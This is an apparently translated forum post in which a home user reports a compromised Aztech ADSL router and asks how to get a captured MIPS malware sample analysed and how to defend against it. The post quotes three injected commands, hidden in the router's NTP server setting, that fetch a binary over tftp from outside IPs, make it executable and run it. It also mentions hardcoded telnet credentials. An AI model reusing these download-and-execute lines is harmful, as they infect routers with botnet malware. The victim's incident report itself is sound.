Backstory
Hace algunos años compré un Aztech DSL5005 enrutador ADSL, fue el único enrutador disponible al que pude verificar que puedo hacer telnet y obtener un entorno Linux adecuado ( quería un OpenWRT habilitado Enrutador ADSL, pero no se pudo obtener ninguno ). A partir de entonces, tuve buena experiencia con él; Pude compilar muchas cosas y hacer que trabajen en él, a saber, transmission-daemon , wget , httpd , transocks ... Fue una gran ayuda ya que solo tengo unas pocas horas de electricidad cada día. , y ayuda a mantener el enrutador con una unidad flash conectada para obtener toda la carga / descarga que necesito para mi trabajo, ya que no puedo mantener mi computadora portátil funcionando todo el tiempo.
Descubriendo el problema
Hace dos meses, fui a la interfaz web del enrutador para jugar con algunas configuraciones de QoS ... Mientras vagaba por las configuraciones, encontré esto, como un "Servidor NTP personalizado":
'cd /tmp;tftp -l4 -r4 -g 182.186.194.41 43630;chmod 777 4;./4'
Instantáneamente desconecté el cable del teléfono del enrutador, lo conecté por telnet y comprobé el archivo mencionado, ¡no estaba allí! Lo siguiente que hice fue hacer una copia de seguridad de la configuración (te da un archivo pseudo-xml con una jerarquía de configuraciones) y luego reinicié la configuración de la fábrica. Procedí a restablecer manualmente la configuración de ADSL ...
Comencé a reflexionar sobre cuál podría ser la fuente del hackeo: si bien el enrutador tiene un usuario "admin" para su interfaz web cuya contraseña se puede cambiar, el usuario / pase de telnet siempre es admin / admin incluso después de cambiar la interfaz web contrapartida. Pude mitigar esto modificando el archivo de configuración y subiéndolo (luego descubrí que también incluye otras dos credenciales codificadas para su interfaz web, cambié ambas). Aunque la interfaz de telnet es solo de LAN y no se puede acceder a ella desde la WAN, pensé que tal vez un malware malicioso en un teléfono inteligente invitado conectado podría haber hecho este daño.
Intenté recuperar dicho archivo manualmente para examinarlo, pero no pude (timeout / inalcanzable) ... Dejé las cosas ahí y pensé que eso es todo, pero luego de unos días lo comprobé nuevamente y encontré esto:
'cd /tmp;tftp -l4 -r4 -g 84.249.67.148 48896;chmod 777 4;./4'
Nuevamente, de alguna manera, el enrutador obtuvo esto nuevamente, yo le hice una conexión de telnet: No hay ningún archivo, intenté obtener el archivo (ejecutando manualmente tftp -l4 -r4 -g ... ), pero no pudo obtenerlo ... Lo intenté por mucho tiempo para encontrar al culpable, no pude ... Entonces, después de perder mucho tiempo, recurrí a dejarlo, y pensé que tal vez es una vieja amenaza que dejó a sus servidores maestros fuera de línea, por lo tanto, no puede recuperar sus archivos, y lo hará. sin daño (¡no es que yo pudiera hacer nada de todos modos!)
Pero! Hoy : ¡Otra vez! Encontré esto:
'cd /tmp;tftp -l4 -r4 -g 31.9.x.x 36227;chmod 777 4;./4'
Esta vez algo fue diferente: el bloqueo de IP pertenece a mi país y el archivo estaba allí. Por lo tanto, las IP anteriores no eran de un servidor de control, sino de víctimas anteriores, solo que esta vez una víctima estaba dentro de mi red nacional y se podía recuperar el archivo. Reinicié el enrutador, luego le envié un telnet y creé un directorio en lugar del archivo que se recuperará (para que no se pueda sobrescribir), luego recuperé el archivo manualmente y lo copié:
aularon@etabits-laptop:/tmp$ file 4
4: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
El archivo está compilado para la arquitectura de mi enrutador ...
¿Qué debo hacer en este caso? ¿Hay un lugar donde pueda enviar dicho archivo para su análisis? a los investigadores de seguridad que lo saben mejor que yo.
Me interesan dos cosas:
- Proporcionando información sobre esta "red de bots",
- Sabiendo cómo tomar contramedidas, por ahora estoy creando el directorio
/tmp/4y eso es todo lo que pude encontrar.
Por favor, consejo!
Editar: Esta pregunta no es un duplicado de ¿Cómo trato con un servidor comprometido? ; Con un servidor comprometido, uno tiene muchas opciones y metodologías que no se aplican cuando se trabaja en un enrutador ... No puedo actualizar ni mucho menos hacer una instalación nueva, también carece de muchos programas, además no puedo capturar paquetes de red desde / a WAN, ya que llegan al enrutador primero. (la respuesta de @mootmoot parece ir en la dirección correcta, lo estoy comprobando y volveré a ello)